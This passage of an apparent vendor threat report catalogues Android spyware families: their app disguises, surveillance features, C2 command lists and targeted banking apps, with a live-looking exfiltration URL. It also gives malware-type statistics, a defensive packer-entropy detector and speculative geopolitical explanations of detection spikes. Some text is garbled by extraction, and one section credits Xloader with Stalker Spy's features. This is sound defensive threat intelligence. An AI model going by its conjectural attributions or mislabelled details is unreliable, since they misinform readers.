The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contact ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server http://http.cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version 1: Dardesh (Google Play Services Instant Apps)
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect the browser's data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and video
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control of the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version 1 to Version 3: FaceBook, Chrome

Disguises of Xloader

Global Threat Report Q2 2018 Edition

Page 31 of 73

After infection Xloader connects to its CampC server and executes the following commands

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo

Extract contacts details

Set Wi-Fi always turned on

Version 2 can execute additional commands

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access to a location specified by attackers

Make records

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service

Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is the list of some commands that the malware can execute on your device:

Send_SMS — extract SMS content and send it to the C&C server

Send_USSD — send the USSD to the C&C server

Gethistory — monitor browser history

Start_AllApp — gather info about installed applications

Send_call — set the Intent action to call

Forward_call — forward incoming calls

ResForward_call — reset call forwarding

Go_Smsmnd — delete SMS content

Go_GetAlls — get SMS history

Dell_sms — delete SMS content in a conversation

Send_spam — send spam SMS

Start_Inject — call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to get users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton

شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.

After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts the spying activity. It steals text messages and audio records, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack

Version 2: TSF Launcher

Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via… another cryptominer, named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

[Chart: Android-targeted malware in April 2018]

4.2.2 May 2018

[Chart: Android-targeted malware in May 2018]

4.2.3 June 2018

[Chart: Android-targeted malware in June 2018]

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
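Because a packed image consists of a compressed (or encrypted) body plus a small decompression stub, the packed sections of an executable have byte entropy close to the 8-bit maximum, which is the signal most scanners use when a modified packer such as MUPX has renamed the tell-tale section names. The following is an added example, not code from the report: the section names and contents are constructed samples, and the UPX0/UPX1 names are the stock UPX convention, not anything the report states about MUPX.

```python
"""Entropy-based packer triage for the sections of an executable.  Added
example, not code from the report.  The section names and byte contents are
constructed; the UPX0/UPX1 names are the stock UPX section names, which a
modified build such as the report's MUPX may rename, so the name check is
only a bonus signal and the entropy of the section contents is the primary one."""
import math
import random
from collections import Counter

# Compressed or encrypted data approaches 8 bits per byte; ordinary x86 code
# and text sit well below this.  The cutoff is a common heuristic, not a standard.
PACKED_ENTROPY = 7.0
STOCK_UPX_NAMES = {"UPX0", "UPX1", "UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the input: 0.0 for empty or constant data, 8.0 maximum."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_sections(sections):
    """sections: iterable of (name, raw_bytes).  Returns one finding per section."""
    findings = []
    for name, raw in sections:
        ent = shannon_entropy(raw)
        reasons = []
        if name in STOCK_UPX_NAMES:
            reasons.append("stock UPX section name")
        if ent >= PACKED_ENTROPY:
            reasons.append("entropy %.2f >= %.1f" % (ent, PACKED_ENTROPY))
        findings.append({"name": name, "entropy": round(ent, 2),
                         "packed": bool(reasons), "reasons": reasons})
    return findings


def likely_packed(sections) -> bool:
    """True if any section looks like a packed or encrypted payload."""
    return any(f["packed"] for f in classify_sections(sections))


def _random_bytes(n: int, seed: int) -> bytes:
    """Deterministic stand-in for a compressed payload (uniform bytes)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed sample 1: stock UPX layout.  UPX0 is the empty unpack target,
# UPX1 holds the compressed image and the decompression stub.
STOCK_UPX_SAMPLE = [
    ("UPX0", b""),
    ("UPX1", _random_bytes(4096, 2018)),
    (".rsrc", b"\x00" * 512 + b"VS_VERSION_INFO" + b"\x00" * 512),
]

# Constructed sample 2: MUPX-style renamed sections.  Only the entropy rule fires.
RENAMED_SAMPLE = [
    (".text", _random_bytes(4096, 7)),
    (".data", b"Hello, world\x00" * 300),
]

# Constructed sample 3: unpacked binary; a short repeating prologue-like
# byte pattern stands in for ordinary low-entropy machine code.
PLAIN_SAMPLE = [
    (".text", bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56]) * 500),
    (".data", b"config=1\n" * 200),
]

if __name__ == "__main__":
    for label, sample in (("stock UPX", STOCK_UPX_SAMPLE),
                          ("renamed", RENAMED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, likely_packed(sample), classify_sections(sample))
```

High entropy also appears in legitimate compressed resources and signed installers, so in practice a packed verdict is a reason to unpack and scan the inner image rather than a conviction on its own.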

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not only in one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

Global Threat Report Q2 2018 Edition

Page 63 of 73

7 Geopolitical Intelligence

71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes

Global Threat Report Q2 2018 Edition

Page 64 of 73

72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests

Global Threat Report Q2 2018 Edition

Page 65 of 73

73 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports

Global Threat Report Q2 2018 Edition

Page 66 of 73

74 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs

Global Threat Report Q2 2018 Edition

Page 67 of 73

75 Armenia

All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018

Global Threat Report Q2 2018 Edition

Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society

Global Threat Report Q2 2018 Edition

Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity showed that it took place almost exclusively in Vantaa, the Helsinki suburb that hosts Helsinki Airport. One caveat applies to every geolocated timeline in this section: detections are placed by IP address, and IP geolocation frequently resolves to an ISP's or hosting provider's location rather than to the infected machine's physical position, so a tight cluster in a single suburb should be read as suggestive rather than conclusive.

8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends that are likely to shape the cybersecurity marketplace and IT end users. These trends not only show an upswing in malware across the world but point to possible future cybersecurity scenarios.

The rise of trojan malware in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the industry should assume that many trojan-based attacks from Q2 remain undetected, with their real impact to be revealed in the quarters to come. Trojans also serve as a delivery vector for other types of malware. Together, these facts point to a surge in infections of hosts worldwide with a wide range of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The spread of fileless malware, the evolution of cryptominers and the abuse of legitimate tools such as PowerShell are clear evidence of this.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information yet lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (messenger correspondence, private pictures), cybercriminals can anticipate rich pickings. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that most of the trojans detected in Q2 were information stealers, another dangerous tendency is visible: cybercriminals are increasingly hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and, probably, to revamp their security strategy, policies and posture.

NORTH AMERICA
Comodo Security Solutions, Inc.
1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531 / +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394
sales@comodo.com

EUROPE
Comodo Security Solutions, Inc.
Șoseaua Națională 31, Iași 700237, Romania
Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd.
Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India
Tel: +91 44 4562 2800
www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown,” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

